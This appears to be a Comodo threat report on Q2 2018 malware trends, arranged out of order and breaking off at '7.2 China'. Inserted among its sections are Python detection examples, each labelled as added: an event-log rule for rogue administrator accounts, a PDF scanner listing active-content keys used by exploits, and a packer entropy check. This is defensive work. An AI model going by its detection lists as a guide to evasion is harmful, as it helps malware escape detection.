The fact that trojan malware increased in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

Offices

North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Contents

• 1 Executive summary
  • 1.1 Overview
  • 1.2 New Trends
    • 1.2.1 Trojans jumped to the top of the malware list
    • 1.2.2 Cryptominers evolved into multifunctional malware
    • 1.2.3 Android malware skyrocketed in variety
    • 1.2.4 Geopolitical intelligence
• 2 Trojans going on the offensive to hunt for confidential data
  • 2.1 The Most Widespread Trojan
  • 2.2 PowerShell-based attack with Emotet
  • 2.3 Flawed Ammyy RAT attack based on legitimate software
  • 2.4 The growth of Flawed Ammyy attacks for Q2
  • 2.5 Ammyy Admin dissemination around the world for Q2
• 3 Cryptominer Evolution: Going Fileless, Killing Competitors, Crashing Systems
  • 3.1 BadShell attacks enterprises
  • 3.2 WinstarNssmMiner, a system killer
  • 3.3 CoinMiner kills rivals
  • 3.4 CoinHive changes its skin
  • 3.5 Cryptocurrency clipboard hijacker intercepts transfers
• 4 Android Devices Under Siege
  • 4.1 Spying, Stealing, Mining
    • 4.1.1 KevDroid
    • 4.1.2 Zoo Park
    • 4.1.3 MikeSpy
    • 4.1.4 Xloader
    • 4.1.5 Stalker Spy
    • 4.1.6 Mystery Bot
    • 4.1.7 FakeSpy
    • 4.1.8 RedAlert
    • 4.1.9 Hero Rat
    • 4.1.10 Sonvpay
    • 4.1.11 CoinHive
  • 4.2 Android Malware Catalogued by Month
    • 4.2.1 April 2018
    • 4.2.2 May 2018
    • 4.2.3 June 2018
• 5 Malware in Q2 2018: The Big Picture
  • 5.1 Strategic Threat: Computer Worms
    • 5.1.1 Generic Worms
    • 5.1.2 Net Worms
    • 5.1.3 Email Worms
    • 5.1.4 p2p Worms
    • 5.1.5 IM Worms
  • 5.2 High Threat Malware
    • 5.2.1 Backdoors
    • 5.2.2 Viruses
    • 5.2.3 Trojans
    • 5.2.4 Exploits
  • 5.3 Medium Threat Malware
    • 5.3.1 Constructor
    • 5.3.2 Packers
    • 5.3.3 Email Flooder
    • 5.3.4 Virtual Tools
    • 5.3.5 Jokes
  • 5.4 Low Threat Malware: Applications
    • 5.4.1 Applications
    • 5.4.2 Unwanted Applications
    • 5.4.3 Unsafe Applications
• 6 Vertical analysis
• 7 Geopolitical Intelligence
  • 7.1 USA
  • 7.2 China
  • 7.3 South Korea
  • 7.4 North Korea
  • 7.5 Armenia
  • 7.6 Belarus
  • 7.7 Iraq
  • 7.8 Ukraine
  • 7.9 Croatia
  • 7.10 Finland, Russia, USA
• 8 Conclusions

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If the user taps this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, named below.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which expands its mining capability. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.

Disguises of CoinHive for Android:

• Version 1: Netflix Hack, Instagram Hack
• Version 2: TSF Launcher
• Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is this possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer in order to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Figure: Android-targeted malware in April 2018

4.2.2 May 2018

Figure: Android-targeted malware in May 2018

4.2.3 June 2018

Figure: Android-targeted malware in June 2018

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network services and defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms spread by mailing copies of themselves, and are nasty in that they can also travel between victim computers by other means, for example via exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos IM Worm; in 2012 the FBI announced the arrest of 10 people for spreading banking malware via social networks with Yahos.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet (also written Dark Komet, or simply Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI), and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to the malicious functionality hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user, and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the Administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
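The account-creation behavior Microsoft attributes to Starter is also a detection opportunity. The following Python is an added example, not code from the report or from Comodo: it correlates Windows Security events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group) to flag a new account promoted to Administrators within minutes by a subject outside an assumed allowlist of provisioning accounts. The sample events and the allowlist are constructed.

```python
"""Flag a freshly created local account that is promptly added to the
Administrators group, the behavior Microsoft attributes to the Starter trojan.

Added example (not code from the report). Field names follow the Windows
Security log: Event ID 4720 = a user account was created, 4732 = a member was
added to a security-enabled local group. The events below are constructed.
"""
from datetime import datetime, timedelta

# Constructed sample events (in production: Get-WinEvent or a SIEM export).
# "subject" is the account that performed the action; for 4732, "account" is
# the member added and "group" the local group it was added to.
SAMPLE_EVENTS = [
    {"time": "2018-06-04T09:12:01", "id": 4720, "subject": "CORP\\helpdesk",
     "account": "jdoe", "group": None},
    {"time": "2018-06-04T09:12:05", "id": 4732, "subject": "CORP\\helpdesk",
     "account": "jdoe", "group": "Remote Desktop Users"},
    {"time": "2018-06-04T11:40:17", "id": 4720, "subject": "WS01\\alice",
     "account": "rsvc$", "group": None},
    {"time": "2018-06-04T11:40:18", "id": 4732, "subject": "WS01\\alice",
     "account": "rsvc$", "group": "Administrators"},
    {"time": "2018-06-04T13:00:00", "id": 4732, "subject": "CORP\\helpdesk",
     "account": "bob", "group": "Administrators"},
    {"time": "2018-06-04T15:30:00", "id": 4720, "subject": "CORP\\helpdesk",
     "account": "svc-backup", "group": None},
    {"time": "2018-06-04T15:30:02", "id": 4732, "subject": "CORP\\helpdesk",
     "account": "svc-backup", "group": "Administrators"},
]

# Assumed allowlist of accounts that legitimately provision local admins.
PROVISIONING_ACCOUNTS = {"CORP\\helpdesk"}
WINDOW = timedelta(minutes=5)   # create-then-promote gap treated as one action


def find_rogue_admins(events, allowlist=PROVISIONING_ACCOUNTS, window=WINDOW):
    """Return (account, creator, seconds) for every account that was created
    by a subject outside `allowlist` and added to Administrators within
    `window` of its creation. Promotions of pre-existing accounts (no
    matching 4720) are ignored here; they belong to a separate rule."""
    created = {}   # account name (case-folded) -> (creation time, creator)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = ev["account"].lower()
        if ev["id"] == 4720:
            created[key] = (t, ev["subject"])
        elif ev["id"] == 4732 and ev["group"] == "Administrators":
            if key not in created:
                continue
            t0, creator = created[key]
            if t - t0 <= window and creator not in allowlist:
                alerts.append((ev["account"], creator, (t - t0).total_seconds()))
    return alerts


if __name__ == "__main__":
    for account, creator, secs in find_rogue_admins(SAMPLE_EVENTS):
        print(f"ALERT: {creator} created {account!r} and made it an "
              f"administrator {secs:.0f}s later")
```

The rule deliberately keys on the create-then-promote sequence rather than on the account name, since names such as "Remote Service Account" vary between variants; the allowlist is the knob that keeps legitimate helpdesk provisioning quiet.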

5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

Exploit detections are comparatively rare, since the underlying vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo focused on a favorite hacker target: Adobe Portable Document Format (.pdf) files, a format created in the 1990s to present documents in a common form independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
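Because an exploit PDF needs some active-content hook to fire, a cheap triage step is to look for those hooks before any sandboxing. The following Python is an added example, not code from the report: it walks a PDF's name tokens for risky keys such as /JavaScript and /OpenAction, resolves the #xx hex escapes that hide them from a plain grep, and inflates Flate-compressed streams so that objects tucked into object streams are scanned too. The two PDFs and the keyword list are constructed assumptions.

```python
"""Triage a PDF for the active-content hooks that PDF exploits rely on
(/JavaScript, /OpenAction, /AA, /Launch, ...), including two evasions that
defeat a naive grep: hex-escaped names (/#4Aava#53cript) and objects hidden
inside Flate-compressed streams.

Added example (not code from the report); the two PDFs below are constructed
test inputs, not samples Comodo reported. The keyword list is an assumption.
"""
import re
import zlib

# Dictionary keys whose presence warrants a closer look. None is malicious by
# itself; the point is to surface the small fraction of files with active content.
RISKY_NAMES = {"JavaScript", "JS", "OpenAction", "AA", "Launch",
               "EmbeddedFile", "RichMedia", "XFA"}

# A PDF name token: "/" followed by regular characters, any of which may be
# written as #xx (two hex digits).
NAME_RE = re.compile(rb"/((?:[^\s/\[\]<>(){}%]|#[0-9A-Fa-f]{2})+)")
# Stream bodies. The look-behind stops "endstream" from matching as a start.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)


def decode_name(raw: bytes) -> str:
    """Resolve #xx escapes, so /#4Aava#53cript compares equal to /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def inflated_streams(data: bytes):
    """Yield the decompressed body of every stream that inflates as zlib data.
    decompressobj() tolerates a clipped trailing checksum byte; uncompressed
    streams are already covered by the outer scan, so they are skipped here."""
    for m in STREAM_RE.finditer(data):
        try:
            out = zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue
        if out:
            yield out


def scan_pdf(data: bytes, depth: int = 0) -> dict:
    """Count risky names in `data` and, recursively, inside its compressed
    streams (object streams commonly hide the catalog's /OpenAction there)."""
    found = {}
    for m in NAME_RE.finditer(data):
        name = decode_name(m.group(1))
        if name in RISKY_NAMES:
            found[name] = found.get(name, 0) + 1
    if depth < 2:  # bounded recursion: streams within streams
        for inner in inflated_streams(data):
            for name, count in scan_pdf(inner, depth + 1).items():
                found[name] = found.get(name, 0) + count
    return found


# Constructed sample: hex-escaped /OpenAction and /JavaScript in the clear,
# plus a compressed object stream carrying a second JavaScript action.
_OBJSTM = zlib.compress(b"7 0 << /S /JavaScript /JS (app.alert(1)) >>")
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /#4FpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /#4Aava#53cript /JS (this.exportDataObject(1)) >> endobj\n"
    b"6 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length "
    + str(len(_OBJSTM)).encode() + b" >>\nstream\n" + _OBJSTM
    + b"\nendstream\nendobj\n%%EOF\n"
)
CLEAN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
             b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n%%EOF\n")

if __name__ == "__main__":
    print("sample:", scan_pdf(SAMPLE_PDF))
    print("clean: ", scan_pdf(CLEAN_PDF))
```

A hit on /OpenAction combined with /JavaScript or /Launch is the pattern worth routing to a sandbox; a lone /AA or /XFA in a form-heavy PDF is usually benign, so the counts are returned rather than a verdict.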

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically generate malware files.

For Q2, Alamar was the #1 constructor that Comodo detected; Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. It is built on UPX, free open-source software that supports numerous file formats and operating systems and leverages UCL, an open-source data compression library whose decompressor is just a few hundred bytes of code in length.

In Q2 2018 Russia was the 1 home to malware Packers

This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
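The following is an added example (not code from the report) of the triage check a defender would run for the packing described above: it parses a PE section table and flags UPX-style section names, the UPX stub marker, and sections whose entropy is high enough to indicate compressed or encrypted content. The section names, the "UPX!" marker string and the 7.0 bits-per-byte threshold are conventional analyst heuristics, and the two PE images are constructed inside the code rather than taken from any real sample.

```python
"""Heuristic packer check for a PE file, keyed to what the section above
describes: a compressed payload plus a small decompression stub.
Added example, not code from the Comodo report. Signals checked: UPX-style
section names / the "UPX!" marker, and high Shannon entropy in a section
(compressed or encrypted bytes look nearly random). Both PE images are
constructed by build_sample_pe(); neither is a real binary.
"""
import hashlib
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[tuple[str, int, float]]:
    """Walk DOS header -> e_lfanew -> COFF header -> section table.
    Returns (name, raw_size, entropy) per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size          # first 40-byte IMAGE_SECTION_HEADER
    out = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        out.append((name, raw_size, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return out


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """Evidence a triage analyst would record before deciding to unpack."""
    sections = parse_sections(pe)
    upx_names = sorted({n for n, _, _ in sections} & {"UPX0", "UPX1", "UPX2"})
    high_entropy = [n for n, size, ent in sections if size and ent >= entropy_threshold]
    marker = b"UPX!" in pe                # stub marker UPX writes into the image
    return {
        "upx_section_names": upx_names,
        "upx_marker": marker,
        "high_entropy_sections": high_entropy,
        "section_entropy": {n: round(ent, 2) for n, _, ent in sections},
        "likely_packed": bool(upx_names or marker or high_entropy),
    }


def build_sample_pe(sections: list[tuple[bytes, bytes]]) -> bytes:
    """Construct a minimal PE skeleton (headers + sections, not loadable)."""
    align = 0x200
    pe = bytearray(0x40)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                       # e_lfanew
    pe += b"PE\0\0"
    # COFF header: Machine=i386, NumberOfSections, zeroed timestamp/symbols,
    # SizeOfOptionalHeader=0 (omitted in this skeleton), Characteristics
    pe += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table = len(pe)
    pe += b"\0" * (40 * len(sections))
    pe += b"\0" * ((-len(pe)) % align)
    for i, (name, data) in enumerate(sections):
        raw_ptr = len(pe)
        pe += data + b"\0" * ((-len(data)) % align)
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, rest zero
        pe[table + 40 * i:table + 40 * (i + 1)] = name.ljust(8, b"\0") + struct.pack(
            "<IIII", len(data), 0x1000 * (i + 1), len(data), raw_ptr) + b"\0" * 16
    return bytes(pe)


def packed_sample() -> bytes:
    """UPX-like layout: empty UPX0, compressed-looking UPX1 with marker, plain .rsrc.
    The payload is deterministic SHA-256 output standing in for compressed code."""
    payload = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(64))
    return build_sample_pe([
        (b"UPX0", b""),
        (b"UPX1", b"UPX!" + payload),
        (b".rsrc", b"constructed resource data\0" * 16),
    ])


def clean_sample() -> bytes:
    """Ordinary layout: low-entropy code bytes (nop; ret) and string data."""
    return build_sample_pe([
        (b".text", b"\x90\xC3" * 512),
        (b".data", b"Hello from a constructed sample\0" * 32),
    ])
```

Entropy alone is a weak signal on its own (legitimate installers and resource-heavy binaries also score high), so it is reported beside the name and marker checks rather than used by itself.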


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes: one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when, in fact, they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline, you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section, we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application,” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and “system optimizers.”

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals,” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected not in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot,” which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

